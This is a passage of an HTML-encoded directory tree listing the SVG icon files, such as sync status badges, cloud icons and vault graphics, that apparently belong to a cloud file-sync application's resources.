&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusError.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusOffline.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusPaused.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusSubBadgeCloud.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusSubBadgeError.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusSubBadgePaused.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusSubBadgeSyncing.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusSubBadgeWarning.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusSynced.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusSyncing.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SyncStatusWarning.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; timelineLong.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; timelineShort.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; treeChevronDown.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; treeChevronLeft.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; treeChevronRight.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; unlinkIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; unlockicon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; upgrade.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; vaultFull.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; vaultIntro.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; vaultUnlocked.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; warning-symbol_grey.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; warning-symbol_yellow.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; waterGlass.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; win7_kfm_done.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; win7_unlink-1.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; win7_unlink-2.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; word.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; yellowFolder.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; lightTheme
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; accountDetection.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; acm_cloud_import.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; acm_confetti.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; acmDismissIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ACMegaImageForQuotaErrors.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; acm_low_disk_space_online_only.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; addedFolderIcon_mac.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; addedFolderIcon_win.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; animation_Pause.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; animation_Play.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; backArrow.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; BlueCloudCritical_default.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; BlueCloudCritical_Win11.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; BlueCloudFull_default.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; BlueCloudFull_Win11.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; BlueCloudOverLimit.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; blue_cloud.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; blurrect.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; bugIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CameraRollBackup.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; cancelIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; checkboxComposite.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; checkmark_hovered.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; checkmark_in_progress.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; checkmark_selected.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; chevron.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; chevronUp.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Clipchamp.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; clock_icon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CloudIconError.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CloudIconOffline.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CloudIconPaused.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CloudIconSynced.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CloudIconSyncing.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CloudIconWarning.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; cloud.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ColoredFolders_Flyout.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; ColoredFolders.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; completed_icon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Defender.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Designer.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; dialog_dismiss.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; done_graphic.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; errorIcon2.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; errorIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; excel.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; exclamation.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; exitIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; eyelash.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; feedbackIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; fileLockIcon.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; filesNotSyncingDisabled.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; filesNotSyncing.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; file.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; finderExtensionPrompt.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; folderIcon20x20.svg
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; folderIcon2.svg
